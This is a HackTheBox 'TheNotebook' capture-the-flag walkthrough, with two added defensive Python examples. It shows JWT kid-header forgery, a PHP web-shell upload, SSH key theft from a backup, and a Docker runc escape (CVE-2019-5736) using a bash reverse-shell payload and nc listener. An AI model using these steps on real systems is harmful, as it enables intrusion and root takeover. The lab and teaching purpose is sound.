Welcome to the TheNotebook writeup from HTB
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k
TheNotebook
tags: HTB, Medium, Linux
Platform: Hackthebox
Difficulty: Medium
OS: Linux
Enumeration
Nmap
We run a scan of all ports to see which ones are open.
# nmap -p- -T4 thenotebook.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-06 22:29 CET
Nmap scan report for thenotebook.htb (10.129.93.6)
Host is up (0.034s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
10010/tcp filtered rxapi
Nmap done: 1 IP address (1 host up) scanned in 15.99 seconds
Now that we know which ports are open, we are going to analyze them in depth.
# nmap -A -Pn -p 22,80,10010 thenotebook.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-06 22:30 CET
Nmap scan report for thenotebook.htb (10.129.93.6)
Host is up (0.057s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 86:df:10:fd:27:a3:fb:d8:36:a7:ed:90:95:33:f5:bf (RSA)
| 256 e7:81:d6:6c:df:ce:b7:30:03:91:5c:b5:13:42:06:44 (ECDSA)
|_ 256 c6:06:34:c7:fc:00:c4:62:06:c2:36:0e:ee:5e:bf:6b (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: The Notebook - Your Note Keeper
10010/tcp filtered rxapi
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.18 - 2.6.22
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 105.30 ms 10.10.14.1
2 105.53 ms thenotebook.htb (10.129.93.6)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.61 seconds
GoBuster
For the directory enumeration of the web server on port 80, we are going to use gobuster.
# gobuster dir -u http://thenotebook.htb/ -w /usr/share/wordlists/dirb/big.txt -t 200 2>/dev/null
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://thenotebook.htb/
[+] Threads: 200
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2021/03/06 22:36:28 Starting gobuster
===============================================================
/admin (Status: 403)
/login (Status: 200)
/logout (Status: 302)
/register (Status: 200)
===============================================================
2021/03/06 22:36:50 Finished
===============================================================
Cookies
On the web page, once we are registered and logged in, we can see that a cookie called auth is created. Its value is a base64-encoded JWT:
eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Imh0dHA6Ly9sb2NhbGhvc3Q6NzA3MC9wcml2S2V5LmtleSJ9.eyJ1c2VybmFtZSI6Ing0djFsMGsiLCJlbWFpbCI6ImFAYi5jIiwiYWRtaW5fY2FwIjpmYWxzZX0.Hw1TQj4s9fjDUl_iLGaSu0Rk5dhHJUuJ3ITbxlC-jEtLUrPqUmG4b9SfIdwp_kVq6bo4joE_Lr0aoea_T5UIL1rC9S3lditiH-xdrAnWIoTFMMNLZ9_134QgN_VRu98hs9Tm4EBgwkz6EHN9_Ps8WdRy9_VdguRSOLxfvwEDRnhIXzydNmTxii0RBqR-5voTKTmiUO-gjdZ_T1fSYVSHuyvO4o0mL_8ETuoW9KkYAZhXHdzIdj-DjPAtOAuFYqY4m_xZdsf4DGobHQzOxbMWvjJeXXE3v7DTBgMYFT7_gUTtGqIgOQQeHaO9Hfzmf45VzG0yX9q19ezqiGAlbyoSzJpRvHEyeL8ShK5XAUcl_UhbC7GMjaFbwOKA5BTxV0MVNP7SgIPS2i9DypwsQ_xU68enVmWVAoWZeLLFje18x84QoUK8U02wYWRYYs7gBEV2r9DA7uZwRinMQn66sRqG-qTF0KKRWlcshpctWzCNjkIPSl63wmvyOnvVi_MjdCo-YA7hdpuP80pMEIu_Ry6TK1cZ64Ed1GHnxrBDcoKPDKBUEZvgRHU7bloGLbWDbVoYP0LQv1X5r0W-BLbdHyyn3h54OFxHMCYkJ6V4FDurrdVKezk4QqUL_M7HT5OK_R3266lWtuDa_hc2PzqSsgcy7QgzUbEHKYg_Wsb723iYEfs
When we decode it, we can identify three important parameters: typ (JWT), which indicates the type of token; kid, which holds the URL from which the server fetches the key used to validate the token's signature; and admin_cap, which indicates whether we are an administrator or a normal user.
{"typ":"JWT","alg":"RS256","kid":"http://localhost:7070/privKey.key"}{"username":"x4v1l0k","email":"a@b.c","admin_cap":false}.<binary RSA signature, not printable>
Knowing this, we can create our own RSA key to sign the token and modify the cookie to become an administrator.
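The weakness described above is that the server trusts whatever kid the token carries and fetches a key from it. As an added example (not code from the writeup or from the box's application), the following Python sketch shows the server-side policy that prevents this: the kid is treated as an opaque identifier that must match a strict pattern and exist in a local key store, and this decision is made before any signature verification, so a kid containing a URL never triggers an outbound fetch. The key store, its single key id "notebook-2021-03" and the placeholder signature are constructed assumptions; the header and payload values are those decoded from the auth cookie above.

```python
import base64
import json
import re

# Header and payload claims as decoded from the auth cookie in the writeup.
SAMPLE_HEADER = {"typ": "JWT", "alg": "RS256", "kid": "http://localhost:7070/privKey.key"}
SAMPLE_PAYLOAD = {"username": "x4v1l0k", "email": "a@b.c", "admin_cap": False}

# Hypothetical server-side key store: opaque kid -> public key PEM.
# Only identifiers live here; never URLs or file paths taken from a client.
KEY_STORE = {
    "notebook-2021-03": "-----BEGIN PUBLIC KEY-----\nPLACEHOLDER\n-----END PUBLIC KEY-----",
}

# A kid is accepted only if it looks like an identifier: no ':' or '/', so
# URLs and path traversal are rejected before the key store is even consulted.
KID_PATTERN = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$")
ALLOWED_ALGS = {"RS256"}


def encode_segment(obj):
    """Serialize a JSON object as an unpadded base64url JWT segment."""
    raw = json.dumps(obj, separators=(",", ":")).encode("utf-8")
    return base64.urlsafe_b64encode(raw).decode("ascii").rstrip("=")


def decode_segment(segment):
    """Base64url-decode one JWT segment (restoring stripped padding) and parse it."""
    padded = segment + "=" * (-len(segment) % 4)
    return json.loads(base64.urlsafe_b64decode(padded).decode("utf-8"))


def build_test_token(header, payload):
    """Constructed token with a placeholder signature, used to exercise the policy."""
    return encode_segment(header) + "." + encode_segment(payload) + ".c2lnbmF0dXJl"


def select_verification_key(token, key_store):
    """Pick the key allowed to verify `token`, trusting nothing in the token itself.

    Returns (public_key_or_None, reason). Every check here runs before the
    signature is examined; a rejected token never causes a key lookup beyond
    the local store, let alone an HTTP request.
    """
    parts = token.split(".")
    if len(parts) != 3:
        return None, "malformed: expected 3 segments"
    try:
        header = decode_segment(parts[0])
    except (ValueError, UnicodeDecodeError):
        return None, "malformed: header is not base64url JSON"
    alg = header.get("alg")
    if alg not in ALLOWED_ALGS:
        # Pin the algorithm server-side; "none" and HS256 downgrades are refused.
        return None, "alg not allowed: %r" % (alg,)
    kid = header.get("kid")
    if not isinstance(kid, str) or not KID_PATTERN.match(kid):
        return None, "kid rejected by policy: %r" % (kid,)
    if kid not in key_store:
        return None, "unknown kid: %r" % (kid,)
    return key_store[kid], "ok"


SAMPLE_TOKEN = build_test_token(SAMPLE_HEADER, SAMPLE_PAYLOAD)

if __name__ == "__main__":
    # The cookie from the box: its kid is a URL, so it is refused outright.
    print(select_verification_key(SAMPLE_TOKEN, KEY_STORE))
    # A token that names a locally known key passes on to real signature checking.
    ok = build_test_token({"alg": "RS256", "typ": "JWT", "kid": "notebook-2021-03"}, SAMPLE_PAYLOAD)
    print(select_verification_key(ok, KEY_STORE))
```

The returned key would then be handed to an RS256 verifier; the point of the example is that the lookup is a dictionary access keyed by a validated identifier, not a fetch driven by client data. Logging every "kid rejected by policy" result also gives a cheap detection signal for exactly the forgery attempt this writeup performs.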
Exploitation
RSA key creation:
kali@kali:/mnt/hgfs/2_MisPostsBlog/HTB/TheNotebook$ ssh-keygen -t rsa -b 1024 -m PEM -f privKey.key
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in privKey.key
Your public key has been saved in privKey.key.pub
The key fingerprint is:
SHA256:U6nCQGxyuXQzI8mMPU8bV8JQmHD4nhFE9TUFJ/7vE7k kali@kali
The key's randomart image is:
+---[RSA 1024]----+
| *oB=B+.. =oo |
| o.#.@ oo + + |
| =.O O + . |
| .o= o . |
| .ooS . .|
| o. . + |
| +|
| E |
| o|
+----[SHA256]-----+
kali@kali:/mnt/hgfs/2_MisPostsBlog/HTB/TheNotebook$ cat privKey.key
-----BEGIN RSA PRIVATE KEY-----
MIICXAIBAAKBgQD043XKd62njtc5tly9C1RUZjf9Pqb+7q7xdCxSqFk8a5PgcOyL
pKYOWMKI5hzrd2VBtZVLH/79FB6OgA/lRsxFBXrDaB/EtYfcRhdAY+uNBni9UqQC
OLzDSvhx18EqOQke7BWxitRcKy2IdrviCeI/tiMBgHbZENM1MqIjAKqGdQIDAQAB
AoGAc9MlgjaqrsaTq1tCb7NtFmImdyPr7kXL/q24zPuNAVPMZGpkpwOf+scmc4OL
CB+3h6Wv0BF5FBAxB6swWXvr3oiINJHQhm8QpjUJ61/YsZ/fqCWsJr9HmFfUrajj
CCLl8wdGZQCpXhtsIIlW6rrDyIofLBx4ygTai5BwQ8bVlkECQQD6vUCvcayrghxA
QJKIJRAfe0alh8qQRPnmVqIU3yowG4drdJvPzSypS/xKq0upHH0jH/sCj0IsmbPo
BUQJXoVlAkEA+gbITVr3ZS7ggesw1FmdnGkEwkzNBB0bhAYaaJEBWT6tjUDoetQw
YnAHoUmQkx1CnLoD3DSGYo5JfqUgx7Kz0QJAQAPpa+F90Bvb0pupzZCI2UDD/Kb6
lHLHyoL7xpBjWPzuSgTvctJTQLXhp76sBnT7jegwUar5niFvySDvCeVT8QJBANw1
RwtieAxk+hVTCMGuYDOXBzr+G39pB4gDPBUmyZJJst968IbmBetdEktKmIwJtFaH
Oskidc2t1is10qYvzVECQER3qnQoryNfEoaTa0aXCCDagvEljMHNvKURJjZdtImn
XEVxRZGddV7WSdmjzmuzGGbcRFl7y7EbPz/aTuUoE3Q=
-----END RSA PRIVATE KEY-----
Creation of the signed cookie:
HEADER
{
"alg": "RS256",
"typ": "JWT",
"kid":"http://10.10.14.164/privKey.key"
}
PAYLOAD
{"username":"x4v1l0k","email":"as@b.c","admin_cap":true}
VERIFY SIGNATURE
In the verify signature section, we add the RSA private key content that ssh-keygen generated for us before.
We copy the text that appears in the "Encoded" section.
eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6Imh0dHA6Ly8xMC4xMC4xNS4yNjo3MDcwL3ByaXZLZXkua2V5In0.eyJ1c2VybmFtZSI6ImFkbWluICAgICAgICIsImVtYWlsIjoiYXNAYi5jIiwiYWRtaW5fY2FwIjoxfQ.cI6EeCp4zrIJbQIzofpmnbYThOF2Q6WVesnk14NZrc1pMJw3CaxtdsrB5LOXKqjl-s6ZHufc10q35XLdvWV1148asDssVlGJ0XEyA9E8W2K5C4d4sXXP9NHoxkWLGZGmCdr--4NvnAHXyRmFnQRcNurdh1LoztRAqIVc-rVRu8w
Now it only remains to replace the value of the "auth" cookie with the previous text and start a web server that serves the key file.
python -m SimpleHTTPServer 80
And we can now access http://10.129.93.4/admin
Now, entering Upload File, we find a form to upload a file. Let's upload a shell.php.
Perfect: we put a terminal listening, click on View, and we have our shell!
Post exploitation
Enumeration
By listing the system files, we can find the file home.tar.gz inside /var/backups.
When we extract it, we find a copy of noah's home directory and, inside it, his id_rsa, which lets us connect by SSH.
www-data@thenotebook:/var/backups$ mkdir /tmp/.htbuser
www-data@thenotebook:/var/backups$ tar -xvf home.tar.gz -C /tmp/.htbuser
home/
home/noah/
home/noah/.bash_logout
home/noah/.cache/
home/noah/.cache/motd.legal-displayed
home/noah/.gnupg/
home/noah/.gnupg/private-keys-v1.d/
home/noah/.bashrc
home/noah/.profile
home/noah/.ssh/
home/noah/.ssh/id_rsa
home/noah/.ssh/authorized_keys
home/noah/.ssh/id_rsa.pub
www-data@thenotebook:/var/backups$
Privilege escalation
Sudo
noah@thenotebook:~$ sudo -l
Matching Defaults entries for noah on thenotebook:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User noah may run the following commands on thenotebook:
(ALL) NOPASSWD: /usr/bin/docker exec -it webapp-dev01*
We are going to see the version of Docker that is installed and if there are any exploits available.
noah@thenotebook:~$ docker version
Client:
Version: 18.06.0-ce
API version: 1.38
Go version: go1.10.3
Git commit: 0ffa825
Built: Wed Jul 18 19:09:54 2018
OS/Arch: linux/amd64
Experimental: false
Looking for vulnerabilities affecting docker exec 18.06, we find that there is one for all versions prior to 18.09.2, as we can see on the CVE web page.
Based on the exploit at this link, we can exploit CVE-2019-5736, which abuses the vulnerability reached through docker exec.
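From the defender's side, the two conditions this escalation relies on (a NOPASSWD sudo rule that hands a user docker exec as root, with a trailing wildcard, on a Docker release older than the fixed one the writeup cites) are both visible in routine host inventory. The following Python audit is an added example, not part of the writeup: it parses the sudo -l output shown above (embedded here as a constructed sample) into rules, flags the risky properties, and compares the docker version string against 18.09.2. The finding names and the list of container runtime binaries are my own choices.

```python
import os
import re

# Constructed sample: the `sudo -l` output from the writeup, as an inventory job
# would collect it. A raw string keeps the backslashes in secure_path intact.
SUDO_L_OUTPUT = r"""Matching Defaults entries for noah on thenotebook:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User noah may run the following commands on thenotebook:
    (ALL) NOPASSWD: /usr/bin/docker exec -it webapp-dev01*
"""

# One sudo rule line: "(runas) TAG: TAG: /path/to/cmd args". Rules listing several
# commands separated by ", " on one line are not split here (kept simple on purpose).
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$")

# Binaries that can start a process inside a container as root on the host.
CONTAINER_RUNTIMES = ("docker", "podman", "runc", "ctr", "crictl", "lxc")

# Release in which the writeup says the docker exec issue was fixed.
FIXED_DOCKER_VERSION = (18, 9, 2)


def parse_sudo_rules(text):
    """Return the command rules from `sudo -l` output as dicts (runas, tags, cmd)."""
    rules = []
    in_commands = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_commands = True   # everything after this header is a rule
            continue
        if not in_commands:
            continue
        m = RULE_RE.match(line)
        if m:
            rules.append({
                "runas": m.group("runas").strip(),
                "tags": [t.rstrip(":") for t in m.group("tags").split()],
                "cmd": m.group("cmd").strip(),
            })
    return rules


def audit_sudo_rules(rules):
    """Flag rule properties that turn a user account into root on the host."""
    findings = []
    for rule in rules:
        argv = rule["cmd"].split()
        binary = os.path.basename(argv[0])
        args = argv[1:]
        if "NOPASSWD" in rule["tags"]:
            findings.append({"check": "nopasswd", "rule": rule["cmd"],
                             "detail": "no password prompt: the user's SSH key alone unlocks this rule"})
        if binary in CONTAINER_RUNTIMES and "exec" in args:
            findings.append({"check": "container-exec", "rule": rule["cmd"],
                             "detail": "root-level exec into a container; container escape bugs become host root"})
        if any(a.endswith("*") for a in args):
            findings.append({"check": "wildcard", "rule": rule["cmd"],
                             "detail": "trailing '*' matches any further text, so the rule does not pin the command line"})
    return findings


def parse_docker_version(version_str):
    """'18.06.0-ce' -> (18, 6, 0); suffixes such as '-ce' are ignored."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", version_str)
    if not m:
        raise ValueError("unrecognised docker version: %r" % (version_str,))
    return tuple(int(x) for x in m.groups())


def docker_client_below_fix(version_str, fixed=FIXED_DOCKER_VERSION):
    """True when the installed docker is older than the release carrying the fix."""
    return parse_docker_version(version_str) < fixed


if __name__ == "__main__":
    for f in audit_sudo_rules(parse_sudo_rules(SUDO_L_OUTPUT)):
        print("%-15s %s" % (f["check"], f["detail"]))
    print("docker 18.06.0-ce below fix:", docker_client_below_fix("18.06.0-ce"))
```

Any of the three findings alone is worth a ticket; all three together on a host whose docker predates the fix is the exact shape of this box. The version check reads the client string from docker version, so on a real fleet it should be paired with the runc version on the host, since that is the component the fix actually updates.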
To exploit it, we are going to download the main.go file and edit the payload line, replacing it with the following:
var payload = "#!/bin/bash \n bash -i >& /dev/tcp/10.10.14.164/8787 0>&1"
Once we have saved it, we compile the file with go build main.go, and a file called main will be generated, which will be our exploit.
Now we just have to connect to the container with sudo /usr/bin/docker exec -it webapp-dev01 bash and load the exploit using wget.
# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
root@c61bf421b6e4:~# wget 10.10.14.164/main
--2021-03-07 02:45:21-- http://10.10.14.164/main
Connecting to 10.10.14.164:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2270002 (2.2M) [application/octet-stream]
Saving to: ‘main’
main 100%[=========================================================================================================================================>] 2.16M 872KB/s in 2.5s
2021-03-07 02:45:24 (872 KB/s) - ‘main’ saved [2270002/2270002]
Now we only have to put a terminal listening, execute the exploit and, when it tells us [+] Overwritten /bin/sh successfully, open a second connection to the container:
sudo /usr/bin/docker exec -it webapp-dev01 bash
When making the second connection, we can see that the exploit prints the following lines, indicating that it has finished.
[+] Found the PID: 54
[+] Successfully got the file handle
[+] Successfully got write handle &{0xc000350060}
And as we can see, in the terminal that we had listening, we now have a shell as root!
# nc -lnvp 8787
listening on [any] 8787 ...
connect to [10.10.14.164] from (UNKNOWN) [10.129.93.75] 42444
bash: cannot set terminal process group (47472): Inappropriate ioctl for device
bash: no job control in this shell
<1a0e529e35be5d23f999e279b3956f18bb85e6cf8e2b6bd9c# id
id
uid=0(root) gid=0(root) groups=0(root)
<1a0e529e35be5d23f999e279b3956f18bb85e6cf8e2b6bd9c# hostname
hostname
thenotebook